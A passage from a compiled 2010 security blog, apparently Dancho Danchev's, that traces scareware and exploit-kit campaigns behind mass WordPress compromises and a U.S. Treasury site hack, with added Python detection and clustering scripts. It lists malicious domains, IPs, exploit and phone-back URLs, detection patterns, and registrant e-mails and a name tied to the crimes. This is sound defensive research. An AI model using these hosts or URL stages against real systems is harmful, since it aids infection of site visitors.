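if (location.hash == "#login") {
    window.top.location.replace("https://example-blog.com/wp-login.php");
}
"""


def foreign_redirect_hosts(script: str, own_domain: str) -> List[str]:
    """Hosts a cookie-gated redirector would send visitors to, excluding our own."""
    if not (COOKIE_RE.search(script) and TOP_REPLACE_RE.search(script)):
        return []
    hosts = set()
    for url in ABS_URL_RE.findall(script):
        host = urlparse(url).hostname or ""
        if host and host != own_domain and not host.endswith("." + own_domain):
            hosts.add(host)
    return sorted(hosts)


def scan_tree(root: str, own_domain: str) -> Dict[str, List[str]]:
    """Map each .php/.js/.html file under root to the foreign hosts it redirects to."""
    findings: Dict[str, List[str]] = {}
    for path in Path(root).rglob("*"):
        if path.suffix.lower() not in {".php", ".js", ".html", ".htm"}:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        hosts = foreign_redirect_hosts(text, own_domain)
        if hosts:
            findings[str(path)] = hosts
    return findings


def demo() -> Dict[str, List[str]]:
    """Write both samples into a throwaway theme directory and scan it."""
    theme = Path(tempfile.mkdtemp()) / "wp-content" / "themes" / "t"
    theme.mkdir(parents=True)
    (theme / "footer.php").write_text("<?php ?>\n<script>" + CAPTURED_SCRIPT + "</script>")
    (theme / "theme.js").write_text(BENIGN_SCRIPT)
    return {Path(k).name: v for k, v in scan_tree(str(theme), "example-blog.com").items()}


if __name__ == "__main__":
    for file, hosts in demo().items():
        print(f"{file}: cookie-gated redirect to {', '.join(hosts)}")
```

Run it against wp-content with the blog's own domain; a hit names the file to pull and the host to add to the blocklist. The cookie gate is why a second visit from the same browser shows a clean page, so scan the files rather than trusting a browser check.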

UPDATED: Thursday, May 13, 2010: Go Daddy posted the following update: "[1]What's Up with Go Daddy, WordPress, PHP Exploits and Malware?".

UPDATED: Thursday, May 06, 2010: The following is a brief update on the campaign's structure, the changed IPs, and the newly introduced scareware samples and phone-back locations over the past few days.

Sample structure from last week:

- kdjkfjskdfjlskdjf.com/kp.php - 94.23.242.40 - AS16276, OVH Paris
- www3.workfree36-td.xorg.pl/?p= - 95.169.186.25 - AS31103, KEYWEB-AS Keyweb AG
- www1.protectsys28-pd.xorg.pl - 94.228.209.182 - AS47869, NETROUTING-AS Netrouting Data Facilities

Detection rate:

- packupdate_build107_2045.exe - [2]Gen:Variant.Ursnif.8; TrojanDownloader:Win32/FakeVimes - Result: 23/41 (56.1 %). Phones back to update2.safelinkhere.net and update1.safelinkhere.net.

Sample structure from this week:

- kdjkfjskdfjlskdjf.com/kp.php - 91.188.59.98 - AS6851, BKCNET "SIA" IZZI
- www4.suitcase52td.net/?p= - 78.46.218.249 - AS24940, HETZNER-AS Hetzner Online AG RZ
- www1.safetypcwork5.net/?p= - 209.212.147.244 - AS32181, ASN-CQ-GIGENET ColoQuest/GigeNet ASN
- www1.safeyourpc22-pr.com - 209.212.147.246 - Email: gkook@checkjemail.nl

Detection rate:

- packupdate_build9_2045.exe - [3]Trojan.Fakealert.7869; Mal/FakeAV-BW - Result: 9/41 (21.95 %)

Sample phones back to:

- update2.keepinsafety.net/?jbjyhxs=kdjfOtXm1J2a0Nei2Mrh24U%3D
- www5.my-security-engine.net
- report.land-protection.com/Reports/SoftServiceReport.php?verint - 91.207.192.24 - Email: gkook@checkjemail.nl
- secure2.securexzone.net/?abbr=MSE&pid=3 - 78.159.108.170 - Email: gkook@checkjemail.nl
- 173.232.149.92/chrome/report.html?uid=2045&wv=wvXP&
- 74.118.193.47/report.html?wv=wvXP&uid=50&lng=
- 74.125.45.100
- update1.keepinsafety.net - 94.228.209.223 - Email: gkook@checkjemail.nl

Related scareware domains that are part of the ongoing campaign are also parked on the following IPs:

78.46.218.249

www3.workfree20-td.xorg.pl
www3.nojimba52-td.xorg.pl
www3.workfree25-td.xorg.pl
[Screenshot: fake "Your Computer is infected" scareware alert listing bogus Trojan and worm detections, with a button prompting the visitor to start the fake protection]

209.212.147.244





















www1.newsys-scanner.com - Email: gkook@checkjemail.nl
www2.securesys-scan2.net - Email: gkook@checkjemail.nl
www1.new-sys-scanner3.net - Email: gkook@checkjemail.nl
www1.safetypcwork5.net - Email: gkook@checkjemail.nl
www1.securesyscare9.net - Email: gkook@checkjemail.nl
www1.freeguard35-pr.net - Email: gkook@checkjemail.nl

95.169.186.25

www4.ararat23.xorg.pl
www3.sdfhj40-td.xorg.pl
www3.nojimba45-td.xorg.pl
www3.workfree36-td.xorg.pl
www3.nojimba46-td.xorg.pl
www4.fiting58td.xorg.pl
www4.birbinsof.net

94.228.209.182

www1.protectsys25-pd.xorg.pl
www1.protectsys26-pd.xorg.pl
www1.protectsys27-pd.xorg.pl
www1.protectsys28-pd.xorg.pl
www1.protectsys29-pd.xorg.pl
www1.soptvirus32-pr.xorg.pl
www1.soptvirus34-pr.xorg.pl

209.212.147.246

www2.securesys-scan2.com - Email: gkook@checkjemail.nl
www1.newsys-scanner1.com - Email: gkook@checkjemail.nl
UPDATED: Thursday, April 29, 2010: kdjkfjskdfjlskdjf.com/js.php remains active and is currently redirecting to www3.workfree36-td.xorg.pl/?p= - 95.169.186.25 and www1.protectsys28-pd.xorg.pl?p= - 94.228.209.182.

Detection rate:

- packupdate_build107_2045.exe - [4]Suspicious: W32/Malware!Gemini; Trojan.Win32.Generic.pak!cobra - Result: 6/41 (14.64 %), phoning back to new domains:

- safelinkhere.net - 94.228.209.223 - Email: gkook@checkjemail.nl
- update2.safelinkhere.net - 93.186.124.93 - Email: gkook@checkjemail.nl
- update1.safelinkhere.net - 94.228.209.222 - Email: gkook@checkjemail.nl
- ns1.safelinkhere.net - 74.118.192.23 - Email: gkook@checkjemail.nl
- ns2.safelinkhere.net - 93.174.92.225 - Email: gkook@checkjemail.nl

The gkook@checkjemail.nl email was used for scareware registrations in December 2009's "[5]A Diverse Portfolio of Fake Security Software - Part Twenty Four".
Parked on 74.118.192.23, [6]AS46664, VolumeDrive (ns1.safelinkhere.net) are also:

ns1.birbins-of.com
ns1.cleanupantivirus.com
ns1.createpc-pcscan-korn.net
ns1.fhio22nd.net
ns1.letme-guardyourzone.com
ns1.letprotectsystem.net
ns1.my-softprotect4.net
ns1.new-pc-protection.com
ns1.payment-safety.net
ns1.romsinkord.com
ns1.safelinkhere.net
ns1.safetyearth.net
ns1.safetypayments.net
ns1.save-secure.com
ns1.search4vir.net
ns1.systemmdefender.com
ns1.upscanyourpc-now.com

Parked on 93.174.92.225, [7]AS29073, ECATEL-AS, Ecatel Network (ns2.safelinkhere.net) are also:

marmarams.com
ns2.cleanupantivirus.com
ns2.dodtorsans.net
ns2.fastsearch-protection.com
ns2.go-searchandscan.net
ns2.guardsystem-scanner.net
ns2.hot-cleanofyourpc.com
ns2.marfilks.net
ns2.my-systemprotection.net
ns2.myprotected-system.com
ns2.myprotection-zone.net
ns2.mysystemprotection.com
ns2.new-systemprotection.com
ns2.newsystem-guard.com
ns2.onguard-zone.net
ns2.pcregrtuy.net
ns2.plotguardto-mypc.com
ns2.protected-field.com
ns2.safelinkhere.net
ns2.scanmypc-online.com
ns2.search-systemprotect.net
ns2.searchscan-online.net
ns2.securemyzone.com
ns2.systemcec7.com
ns2.trust-systemprotect.net
ns2.trustscan-onmyzone.com
ns2.trustsystemguard.net
ns2.upscanyour-pcnow.com
ns2.windows-systemshield.net
ns2.windows-virusscan.com
ns2.windowsadditionalguard.net
Following last week's Network Solutions mass compromise of WordPress blogs ([8]Dissecting the WordPress Blogs Compromise at Network Solutions), over the weekend a similar incident took place at Go Daddy, [9]according to WPSecurityLock.

Since the campaign's URLs are still active, and since historical OSINT ties it to known operations of cybercriminals profiled before (one of the key domains used in the campaign is registered to hilarykneber@yahoo.com. Yes, that Hilary Kneber.), it's time to connect the dots.

• Related Hilary Kneber posts: [10]The Kneber botnet - FAQ; [11]Celebrity-Themed Scareware Campaign Abusing DocStoc; [12]Dissecting an Ongoing Money Mule Recruitment Campaign; [13]Keeping Money Mule Recruiters on a Short Leash - Part Four

One of the domains used, cechirecom.com/js.php - 61.4.82.212 - Email: lee_gerstein@yahoo.co.uk, was redirecting to www3.sdfhj40-td.xorg.pl?p= - 95.169.186.25 and from there to www2.burnvirusnow34.xorg.pl?p= - 217.23.5.51.


[Screenshot: fake "Virus Scanner" page styled as a Windows Explorer window, listing bogus detections (Trojan.Clampi, Trojan.Thuxeme, AdvWare.Hotbar, Packed.Generic.287, W32.Fujacks) on Local Disk (C:) and (D:), a "Windows Security / Antivirus Protection Disabled" warning and an "Erase Infected" button; the status line reports Browser: IE 7.0, Operating system: Windows Vista]
The front page of the currently not responding cechirecom.com was returning the following message:

• "Welcome. Site will be open shortly. Signup, question or abuse please send to larisadolina@yahoo.com"

Registered with the same email, larisadolina@yahoo.com, is another domain known to have been used in similar attacks in February 2010 - iss9w8s89xx.org.

Parked on 217.23.5.51 are related scareware domains that are part of the campaign:

www2.burnvirusnow31.xorg.pl
www2.burnvirusnow33.xorg.pl
www2.burnvirusnow34.xorg.pl
www2.trueguardscaner30-p.xorg.pl
www2.trueguardscaner33-p.xorg.pl
www1.savesysops30p.xorg.pl
www1.suaguardprotect11p.xorg.pl
www2.realsafepc32p.xorg.pl
www1.suaguardprotect13p.xorg.pl
www1.suaguardprotect14p.xorg.pl

Detection rate for the scareware:

- packupdate_build107_2045.exe - [14]VirusDoctor; Mal/FakeAV-BW - Result: 14/41 (34.15 %) with the sample
phoning back to the following URLs:

- update2.savecompnow.com/index.php?controller=hash - 91.207.192.25 - Email: gkook@checkjemail.nl
- update2.savecompnow.com/index.php?controller=microinstaller
- update1.savecompnow.com/index.php?controller=microinstaller - 94.228.209.223 - Email: gkook@checkjemail.nl

The same email was originally seen in December 2009's "[15]A Diverse Portfolio of Fake Security Software - Part Twenty Four". Parked on these IPs are also related phone-back locations:

Parked on 188.124.7.156:

savecompnow.com - Email: gkook@checkjemail.nl
securemyfield.com - Email: gkook@checkjemail.nl
update1.securepro.xorg.pl

Parked on 91.207.192.25:

update2.savecompnow.com - Email: gkook@checkjemail.nl
update2.xorg.pl
update2.winsystemupdates.com - Email: gkook@checkjemail.nl
report.zoneguardland.net - Email: gkook@checkjemail.nl

Parked on 94.228.209.223:

update1.savecompnow.com - Email: gkook@checkjemail.nl
update1.winsystemupdates.com
Although cechirecom.com/js.php is not currently responding, parked on the same IP, 61.4.82.212, is another currently active domain, which is registered to hilarykneber@yahoo.com.

Parked on 61.4.82.212, AS17964, DXTNET Beijing Dian-Xin-Tong Network Technologies Co., Ltd.:

kdjkfjskdfjlskdjf.com - Email: hilarykneber@yahoo.com
ns1.stablednsstuff.com - Email: lee_gerstein@yahoo.co.uk
js.ribblestone.com - Email: skeletor71@comcast.net - includes a link pointing to panelscansecurity.org/?affid=320&subid=landing - 91.212.127.19 - Email: bobarter@xhotmail.net

The currently active campaign domain redirection is as follows:

kdjkfjskdfjlskdjf.com/js.php - 61.4.82.212 - Email: hilarykneber@yahoo.com
- www3.sdfhj40-td.xorg.pl?p=
- www1.soptvirus42-pr.xorg.pl?p= - 209.212.149.19

Parked on 209.212.149.19:

www2.burnvirusnow43.xorg.pl
www2.trueguardscaner42-p.xorg.pl
www1.suaguardprotect23p.xorg.pl
www2.realsafepc27p.xorg.pl
www1.fastfullfind27p.xorg.pl
www1.yesitssafe-now-forsure.in
Detection rate for the scareware:

- packupdate_build106_2045.exe - [16]TrojanDownloader:Win32/FakeVimes; High Risk Cloaked Malware - Result: 7/41 (17.08 %)

Just like in Network Solutions' case ([17]Dissecting the WordPress Blogs Compromise at Network Solutions), the end user has to be protected from himself through basic security auditing of default WordPress installations. Expecting the end user to audit himself is wishful thinking.

It seems that hilarykneber@yahoo.com related activities are not going to go away anytime soon.
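The "connect the dots" pivoting above is mechanical once the observations are in one place, so here is an added example of it in code (not from the original post): RECORDS, REDIRECTS and PHONES_BACK are transcribed from a subset of the hostnames, IPs, registrant e-mails, redirect chains and phone-back locations the post lists, enough to show every pivot type. Starting from one seed, the walk follows shared hosting IPs, shared registrant e-mails, observed redirects and sample phone-backs, and records for each host which pivot pulled it into the cluster, so the chain of evidence can be reproduced later.

```python
"""Cluster campaign infrastructure by shared IP, registrant e-mail, redirect and phone-back."""
from collections import defaultdict, deque
from typing import Dict, List, Tuple

# (hostname, hosting IP, registrant e-mail or None), as given in the post above.
RECORDS = [
    ("kdjkfjskdfjlskdjf.com", "61.4.82.212", "hilarykneber@yahoo.com"),
    ("cechirecom.com", "61.4.82.212", "lee_gerstein@yahoo.co.uk"),
    ("ns1.stablednsstuff.com", "61.4.82.212", "lee_gerstein@yahoo.co.uk"),
    ("js.ribblestone.com", "61.4.82.212", "skeletor71@comcast.net"),
    ("www3.sdfhj40-td.xorg.pl", "95.169.186.25", None),
    ("www3.workfree36-td.xorg.pl", "95.169.186.25", None),
    ("www2.burnvirusnow34.xorg.pl", "217.23.5.51", None),
    ("www2.trueguardscaner30-p.xorg.pl", "217.23.5.51", None),
    ("www1.soptvirus42-pr.xorg.pl", "209.212.149.19", None),
    ("www1.safetypcwork5.net", "209.212.147.244", "gkook@checkjemail.nl"),
    ("www1.newsys-scanner.com", "209.212.147.244", "gkook@checkjemail.nl"),
    ("update2.savecompnow.com", "91.207.192.25", "gkook@checkjemail.nl"),
    ("update1.savecompnow.com", "94.228.209.223", "gkook@checkjemail.nl"),
    ("safelinkhere.net", "94.228.209.223", "gkook@checkjemail.nl"),
    ("ns1.safelinkhere.net", "74.118.192.23", "gkook@checkjemail.nl"),
    ("ns1.cleanupantivirus.com", "74.118.192.23", None),
]
# Observed redirects (source -> destination) from the post's chains.
REDIRECTS = [
    ("cechirecom.com", "www3.sdfhj40-td.xorg.pl"),
    ("kdjkfjskdfjlskdjf.com", "www3.sdfhj40-td.xorg.pl"),
    ("www3.sdfhj40-td.xorg.pl", "www2.burnvirusnow34.xorg.pl"),
    ("www3.sdfhj40-td.xorg.pl", "www1.soptvirus42-pr.xorg.pl"),
]
# The scareware served via the cechirecom.com chain reports to savecompnow.com.
PHONES_BACK = [
    ("www2.burnvirusnow34.xorg.pl", "update2.savecompnow.com"),
]

Pivot = Tuple[str, str]  # (kind, value), e.g. ("ip", "61.4.82.212")


def build_graph() -> Dict[str, List[Tuple[str, str, str]]]:
    """Undirected adjacency: host -> [(neighbour, pivot kind, pivot value)]."""
    by_ip, by_email = defaultdict(set), defaultdict(set)
    for host, ip, email in RECORDS:
        by_ip[ip].add(host)
        if email:
            by_email[email].add(host)
    adj: Dict[str, List[Tuple[str, str, str]]] = defaultdict(list)
    for kind, index in (("ip", by_ip), ("email", by_email)):
        for value, hosts in index.items():
            for h in hosts:
                adj[h].extend((o, kind, value) for o in sorted(hosts) if o != h)
    for kind, edges in (("redirect", REDIRECTS), ("phone-back", PHONES_BACK)):
        for src, dst in edges:
            adj[src].append((dst, kind, f"{src} -> {dst}"))
            adj[dst].append((src, kind, f"{src} -> {dst}"))
    return adj


def cluster(seed: str) -> Dict[str, Pivot]:
    """Breadth-first walk from seed; each host maps to the pivot that first reached it."""
    adj = build_graph()
    reached: Dict[str, Pivot] = {seed: ("seed", seed)}
    queue = deque([seed])
    while queue:
        host = queue.popleft()
        for other, kind, value in adj[host]:
            if other not in reached:
                reached[other] = (kind, value)
                queue.append(other)
    return reached


def ips_for_email(email: str) -> List[str]:
    """Hosting IPs seen behind one registrant e-mail (a cheap blocklist seed)."""
    return sorted({ip for _, ip, e in RECORDS if e == email})


if __name__ == "__main__":
    for host, (kind, value) in sorted(cluster("kdjkfjskdfjlskdjf.com").items()):
        print(f"{host:36} via {kind}: {value}")
    print("gkook@checkjemail.nl IPs:", ", ".join(ips_for_email("gkook@checkjemail.nl")))
```

Seeded with the Kneber-registered domain, the walk reaches the gkook@checkjemail.nl phone-back infrastructure only through the phone-back edge, which is exactly the link the post draws between the two registrants; keep the pivot kind with each host so a reviewer can tell a hard link (shared registrant, observed redirect) from a soft one (shared IP at a large hoster).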

Related WordPress security resources:

[18] 20 Wordpress Security Plug-ins And Tips To keep Hackers Away
[19] 11 Best Ways to Improve WordPress Security
[20] 20+ Powerful Wordpress Security Plugins and Some Tips and Tricks

This post has been reproduced from [21]Dancho Danchev's blog. Follow him [22]on Twitter.

1. http://community.godaddy.com/godaddy/whats-up-with-go-daddy-wordpress-php-exploits-and-malware/

2. https://www.virustotal.com/analisis/38c96fc7f402772beed9c83512da6189cb9b92f7f36fc8a5c8b70f2a6fc4faab-1273070694

3. http://www.virustotal.com/analisis/d0bba30e43ddc5db394fd0c03314d2d2c2743f7f611c08f0ae15a8d588ffd990-1273150790

4. http://www.virustotal.com/analisis/ad643ead6b46c70dba4741dd548842eab49d2d7d52637f32723c0084366b44b3-1272544449

5. http://ddanchev.blogspot.com/2009/12/diverse-portfolio-of-fake-security.html

6. http://ddanchev.blogspot.com/2010/04/dns-infrastructure-of-money-mule.html

7. http://ddanchev.blogspot.com/2010/04/dns-infrastructure-of-money-mule.html

8. http://ddanchev.blogspot.com/2010/04/dissecting-wordpress-blogs-compromise.html

9. http://www.wpsecuritylock.com/cechriecom-com-script-wordpress-hacked-on-godaddy-case-study/

10. http://blogs.zdnet.com/security/?p=5508

11. http://ddanchev.blogspot.com/2009/12/celebrity-themed-scareware-campaign_07.html

12. http://ddanchev.blogspot.com/2010/02/dissecting-ongoing-money-mule.html

13. http://ddanchev.blogspot.com/2010/04/keeping-money-mule-recruiters-on-short.html

14. http://www.virustotal.com/analisis/d10679c06cde2785c4fd8841607dd44692b4e2e867c015bfeac29d621a6cebd3-1272384002

15. http://ddanchev.blogspot.com/2009/12/diverse-portfolio-of-fake-security.html

16. http://www.virustotal.com/analisis/efd60f4c444baf2b19194385c477b0533580aa430e1ad1d664afb3d389cc9116-1272385512

17. http://ddanchev.blogspot.com/2010/04/dissecting-wordpress-blogs-compromise.html

18. http://blog.taragana.com/index.php/archive/20-wordpress-security-plug-ins-and-tips-to-keep-hackers-away/

19. http://www.problogdesign.com/wordpress/11-best-ways-to-improve-wordpress-security/

20. http://speckyboy.com/2009/09/22/20-powerful-wordpress-security-plugins-and-some-tips-and-tricks/

21. http://ddanchev.blogspot.com/

22. http://twitter.com/danchodanchev
Summarizing Zero Day's Posts for April (2010-04-29 14:09)

The following is a brief summary of all of my posts at [1]ZDNet's Zero Day for April, 2010. You [2]can also go through [3]previous summaries, as well as subscribe to my [4]personal RSS feed, [5]Zero Day's main feed, or follow me on Twitter:

Recommended reading: [6]Attack of the Opt-In Botnets; [7]Hundreds of high profile sites unprotected from domain hijacking and [8]Copyright violation alert ransomware in the wild

01. [9]Facebook phishing campaign serving ZeuS crimeware

02. [10]Researchers expose complex cyber espionage network

03. [11]Copyright violation alert ransomware in the wild

04. [12]Do teens hack? Survey says 1 in 6 do

05. [13]Google: Scareware accounts for 15 percent of all malware

06. [14]New Mac OS X malware variant spotted

07. [15]Hundreds of high profile sites unprotected from domain hijacking

08. [16]Report: ZeuS crimeware kit, malicious PDFs drive growth of cybercrime

09. [17]Attack of the Opt-In Botnets

10. [18]1.5 million Facebook accounts offered for sale - FAQ

11. [19]How to remove the ICPP Copyright Violation Alert ransomware
U.S. Treasury Site Compromise Linked to the Network Solutions Mass WordPress Blogs Compromise (2010-05-04 22:56)

UPDATED: Saturday, May 08, 2010: 5 new domains have been introduced by the same gang, once again parked at 217.23.14.14, AS49981, WorldStream.

jumpsearches.com - 217.23.14.14 - Email: alex1978a@bigmir.net
ingeniosearch.net - 217.23.14.14 - Email: alex1978a@bigmir.net
searchnations.com - 217.23.14.14 - Email: alex1978a@bigmir.net
mainssearch.com - 217.23.14.14 - Email: alex1978a@bigmir.net
bigsearchinc.com - 217.23.14.14 - Email: alex1978a@bigmir.net

Sample exploitation structure:

- jumpsearches.com/bing.com/load.php?spl=mdac
- jumpsearches.com/bing.com/error.js.php
- jumpsearches.com/bing.com/pdf.php
- jumpsearches.com/bing.com/?spl=2&br=MSIE&vers=7.0&s=
- jumpsearches.com/bing.com/load.php?spl=pdf
- jumpsearches.com/bing.com/load.php?spl=MS09-002

UPDATED: Thursday, May 06, 2010: The cybercriminals behind this ongoing campaign have continued introducing new domains over the past 24 hours - all of which are currently in a cover-up phase, pointing to 127.0.0.1.

What's particularly interesting is that all of them reside within AS49981, WorldStream = Transit Imports = -CAIW-, Netherlands.

- twcorps.com/tv/ - 217.23.14.15 - Email: alex1978a@bigmir.net, Prokopenko Aleksey
- [1]MD5: ebcfaa2f595ccea81176f6f125b31ac7

- jobsatdoor.com/plain/ - 217.23.14.14 - Email: alex1978a@bigmir.net, Prokopenko Aleksey
- [2]MD5: ebcfaa2f595ccea81176f6f125b31ac7

- oficla.com/plain/ - 217.23.14.14 - Email: alex1978a@bigmir.net, Prokopenko Aleksey
- [3]MD5: ebcfaa2f595ccea81176f6f125b31ac7

- organization-b.com/mail/ - 217.23.14.14 - Email: alex1978a@bigmir.net, Prokopenko Aleksey

- dilingdiling.com/router/ - 217.23.14.14 - Email: alex1978a@bigmir.net, Prokopenko Aleksey

All the samples phone back to mazcostrol.com/inst.php?aid=blackout, which now responds to 95.143.193.61, AS49770, SERVERCONNECT-AS ServerConnect Sweden AB, having moved from the previously known IP 188.124.16.134.

mazcostrol.com is not just a phone-back location. It's also actively serving client-side exploits. Sample update obtained from the same domain:

- update4303.exe - [4]Trojan.Win32.VBKrypt - Result: 5/41 (12.2 %)

Not surprisingly, AS44565 and AS49770, where mazcostrol.com was hosted, are also home to currently active ZeuS crimeware C&Cs.

[5]AS49770 (SERVERCONNECT-AS ServerConnect Sweden AB)

brunongino.com
slavenkad.com
frondircass.cn
pradsuyz.cn

[6]AS44565 (VITAL VITAL TEKNOLOJI)

spacebuxer.com
odboe.info
212.252.32.69
jokersimson.net
whoismak.net
188.124.7.247
www.bumagajet.net
barmatuxa.info
barmatuxa.net

UPDATED: A researcher just pinged me with details on something that I should be flattered with. Apparently grepad.com /in.cgi?4 redirects to 217.23.14.14 /int.php, which then [7]redirects to my Blogger profile.

In fact, 217.23.14.14, the IP of the client-side exploit serving domains, also redirects there, with the actual campaign in a cover-up phase and the original domain now responding to 127.0.0.1.

Let's see for how long. Until then, [8]The Beatles - You Know My Name seems to be the appropriate music choice.


[9]AVG and Panda Labs are reporting that the web sites of [10]the U.S. Bureau of Engraving and Printing (bep.treas.gov; moneyfactory.gov) are serving client-side exploits that ultimately expose the visitor to scareware ([11]The Ultimate Guide to Scareware Protection).

What's particularly interesting about this campaign is that it's part of last month's NetworkSolutions mass WordPress blogs compromise: not only is the iFrame-d domain registered using the same email as the client-side exploit serving domains from the NetworkSolutions campaign - alex1978a@bigmir.net - but the dropped scareware's phone-back location - mazcostrol.com/inst.php?aid=blackout - 188.124.16.134 - Email: alex1978a@bigmir.net - is also identical to the one used in that campaign, including the affiliate ID (aid=blackout) used by the original cybercriminal.

The client-side exploit serving domain used in the U.S. Treasury site compromise has also been [12]reported by a large number of NetworkSolutions customers in the most recent campaign affecting WordPress blogs.

The exploit-serving structure, including the detection rates for the dropped scareware and exploits used in the U.S. Treasury compromise campaign, is as follows:

- grepad.com /in.cgi?3 - 188.124.16.133, AS44565, VITAL TEKNOLOJI - Email: alex1978a@bigmir.net
- thejustb.com /just/ - 217.23.14.14 (dyndon.com), AS49981 - Email: alex1978a@bigmir.net
- thejustb.com /just/pdf.php
- thejustb.com /just/1.pdf
- thejustb.com /just/load.php?spl=javas
- thejustb.com /just/j1_893d.jar
- thejustb.com /just/j2_079.jar

- 1.pdf - [13]Exploit.PDF-JS.Gen (v) - Result: 1/41 (2.44 %)
- j1_893d.jar - [14]Trojan-Downloader:Java/Agent.DJDN - Result: 5/41 (12.20 %)
- j2_079.jar - [15]EXP/Java.CVE-2009-3867.C.2; Exploit.Java.Agent.a - Result: 9/41 (21.96 %)
- grepad.exe - [16]Trojan.Generic.KD.10339; a variant of Win32/Injector.BNG - Result: 8/41 (19.51 %)

Upon successful exploitation the dropped grepad.exe phones back to mazcostrol.com/inst.php?aid=blackout - 188.124.16.134, AS44565, VITAL TEKNOLOJI - Email: alex1978a@bigmir.net, the same phone-back location also used in the [17]NetworkSolutions mass compromise campaign.

Known MD5s used by the same campaigner in previous campaigns, phoning back to the same domain with the identical affiliate ID:

MD5=4734162bb33eff7af7e18243821b397e
MD5=1c9ce1e5f4c2f3ec1791554a349bf456
MD5=d11d76c6ecf6a9a87dcd510294104a66
MD5=c33750c553e6d6bdc7dac6886f65b51d
MD5=74cdadfb15181a997b15083f033644d0
MD5=3c7d8cdc73197edd176167cd069878bd
Attempting to interact with the campaign's directories often 
results in a "nice try, idiot." message. Lovely! 
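The linkage argued above rests on a handful of repeated attributes (registrant email, parking IP, ASN and the aid=blackout affiliate ID) plus the exploit kit's recognizable URL stages (in.cgi redirector, load.php?spl=, the PDF/JAR fetches, inst.php?aid= phone-back). Given the 1/41 and 5/41 detection rates listed, those network indicators are the more dependable thing to block on. The following Python script is an added example, not code from the original post: it pivots the post's own indicators on shared attributes and flags the same URL stages in proxy log lines. The squid-style log format, the sample lines and the benign example.com entry are constructed for the demonstration.

```python
"""Added example (not from the original post): pivot the campaign's indicators
on shared attributes and flag its exploit-kit / phone-back URL stages in a
proxy log. The log lines below are constructed, not real traffic."""
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Indicators as listed in the post: (host, ip, asn, registrant_email)
INDICATORS = [
    ("grepad.com",       "188.124.16.133", "AS44565", "alex1978a@bigmir.net"),
    ("thejustb.com",     "217.23.14.14",   "AS49981", "alex1978a@bigmir.net"),
    ("mazcostrol.com",   "188.124.16.134", "AS44565", "alex1978a@bigmir.net"),
    ("jumpsearches.com", "217.23.14.14",   "AS49981", "alex1978a@bigmir.net"),
    ("twcorps.com",      "217.23.14.15",   "AS49981", "alex1978a@bigmir.net"),
]


def pivot(indicators, field):
    """Group hosts by one attribute ("ip", "asn" or "email") to show what links them."""
    idx = {"ip": 1, "asn": 2, "email": 3}[field]
    groups = defaultdict(list)
    for row in indicators:
        groups[row[idx]].append(row[0])
    return dict(groups)


def classify_url(url):
    """Label the stage of the infection chain a URL belongs to, or None.

    Stages taken from the post: in.cgi redirector -> load.php?spl=<exploit>
    loader -> pdf.php / *.pdf / *.jar payload -> inst.php?aid=<affiliate> phone-back.
    """
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    path, qs = parts.path.lower(), parse_qs(parts.query)
    if path.endswith("/load.php") and "spl" in qs:
        return "kit-loader:" + qs["spl"][0]
    if path.endswith("/inst.php") and "aid" in qs:
        return "phone-back:aid=" + qs["aid"][0]
    if path.endswith("/in.cgi"):
        return "tds-redirector"
    if path.endswith(("/pdf.php", ".pdf", ".jar")):
        return "kit-payload"
    return None


# Constructed squid-style access log (ts elapsed client code bytes method url ...).
SAMPLE_LOG = """\
1273104000.101 312 10.0.0.5 TCP_MISS/200 1422 GET http://grepad.com/in.cgi?3 - DIRECT/188.124.16.133 text/html
1273104001.220 120 10.0.0.5 TCP_MISS/200 9810 GET http://thejustb.com/just/load.php?spl=javas - DIRECT/217.23.14.14 text/html
1273104001.901 95 10.0.0.5 TCP_MISS/200 14002 GET http://thejustb.com/just/j2_079.jar - DIRECT/217.23.14.14 application/java-archive
1273104003.410 80 10.0.0.5 TCP_MISS/200 512 GET http://mazcostrol.com/inst.php?aid=blackout - DIRECT/188.124.16.134 text/html
1273104005.000 60 10.0.0.9 TCP_MISS/200 2048 GET http://www.example.com/index.html - DIRECT/93.184.216.34 text/html
"""


def scan_log(text):
    """Return (client_ip, host, stage) for every log line whose URL matches a stage."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        client, url = fields[2], fields[6]
        label = classify_url(url)
        if label:
            hits.append((client, urlsplit(url).hostname, label))
    return hits


if __name__ == "__main__":
    print(pivot(INDICATORS, "email"))
    print(pivot(INDICATORS, "asn"))
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A client that produces the redirector, loader, payload and phone-back stages in sequence within a few seconds, as 10.0.0.5 does in the constructed log, is the pattern worth alerting on; a lone phone-back hit with aid=blackout is enough to tie a host to this affiliate regardless of which exploit-serving domain the gang rotates to next.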

Related posts:

[18]GoDaddy's Mass WordPress Blogs Compromise Serving Scareware
[19]Dissecting the WordPress Blogs Compromise at Network Solutions

This post has been reproduced from [20]Dancho Danchev's blog. Follow him [21]on Twitter.

1. http://www.virustotal.com/analisis/84d634a8c825c089313fa1036c1be3274f54f3c0964f3602de63352c39cab9c1-1273109615
2. http://www.virustotal.com/analisis/b2842a1a395aa627c30bb
5. https://zeustracker.abuse.ch/monitor.php?as=49770
7. http://www.blogger.com/profile/09989733095447891258
8. http://www.youtube.com/watch?v=9DkaRUto3w8
9. http://thompson.blog.avg.com/2010/05/treasury-website-hacked.html
10. http://pandalabs.pandasecurity.com/usa-treasury-website-hacked-using-exploit-kit/
11. http://blogs.zdnet.com/security/?p=4297
12. http://blog.sucuri.net/2010/05/new-infections-today-at-network.html
13. https://www.virustotal.com/analisis/ed8f5cbe78fffe7481a33c
14. https://www.virustotal.com/analisis/50de5fc37f46e868c1ef43
17. http://ddanchev.blogspot.com/2010/04/dissecting-wordpress-blogs-compromise.html
From the Koobface Gang with Scareware Serving Compromised Sites (2010-05-08 20:46)

Following last month's "[1]Dissecting Koobface Gang's Latest Facebook Spreading Campaign" Koobface gang coverage, it's time to summarize some of their botnet spreading activities from the last couple of days.

Immediately after the suspension of their automatically registered Blogspot accounts, the gang once again proved that it has contingency plans in place, and started pushing links to compromised sites across Facebook, in combination with an interesting "visual social engineering trick" which sadly works pretty well, in the sense that it completely undermines the "don't click on links pointing to unknown sites" type of security tip.

• Recommended reading: [2]10 things you didn't know about the Koobface gang

